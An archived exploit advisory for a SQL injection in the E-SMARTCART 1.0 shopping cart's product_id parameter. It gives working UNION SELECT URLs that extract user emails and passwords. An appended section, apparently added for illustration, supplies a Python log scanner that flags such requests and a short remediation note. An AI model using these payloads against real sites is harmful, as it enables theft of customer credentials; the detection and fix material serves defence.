*******************************************************************************
# Title : E-SMARTCART 1.0 (product_id) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : ...
# $ : $49.00

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//productdetail.asp?p=1&subcat_id=-1&category_id=-1&product_id=[SQL]

Example:

//productdetail.asp?p=1&subcat_id=-1&category_id=-1&product_id=-1%20union%20select%200,email,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
//productdetail.asp?p=1&subcat_id=-1&category_id=-1&product_id=-1%20union%20select%200,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# I'm not a hacker!

# milw0rm.com [2007-01-03]
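
Detection logic for the request pattern above, added here as an example and not part of the original advisory: it flags productdetail.asp requests in an IIS W3C log whose numeric parameters decode to anything other than an integer. The log lines, the /shop path and the integer-only assumption are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Query parameters of productdetail.asp, taken from the URL in the advisory.
# Assumption: the application only ever expects integers in them.
NUMERIC_PARAMS = {"p", "subcat_id", "category_id", "product_id"}
INT_RE = re.compile(r"-?\d{1,10}")

# Constructed sample in IIS W3C extended format (documentation IP addresses).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2007-01-03 10:15:02 198.51.100.20 GET /shop/productdetail.asp p=1&subcat_id=3&category_id=2&product_id=41 200
2007-01-03 10:15:40 203.0.113.7 GET /shop//productdetail.asp p=1&subcat_id=-1&category_id=-1&product_id=-1%20union%20select%200,email,0%20from%20users 200
2007-01-03 10:16:05 198.51.100.20 GET /shop/default.asp - 200
"""

def suspicious_params(uri_stem, uri_query):
    """Return {name: decoded value} for numeric parameters that are not plain integers."""
    if not uri_stem.lower().endswith("/productdetail.asp"):
        return {}
    bad = {}
    # parse_qs percent-decodes each value once, as the web server does.
    for name, values in parse_qs(uri_query, keep_blank_values=True).items():
        if name.lower() in NUMERIC_PARAMS:
            for value in values:
                if not INT_RE.fullmatch(value.strip()):
                    bad[name.lower()] = value
    return bad

def scan(log_text):
    """Return [(client_ip, bad_params)] for every flagged request in a W3C log."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rec = dict(zip(fields, line.split()))
            bad = suspicious_params(rec.get("cs-uri-stem", ""), rec.get("cs-uri-query", ""))
            if bad:
                hits.append((rec.get("c-ip"), bad))
    return hits

if __name__ == "__main__":
    for ip, bad in scan(SAMPLE_LOG):
        print(ip, bad)
```

The same integer-only check, applied in the ASP page before the value reaches the query and combined with a parameterized ADODB.Command, closes the hole on the application side.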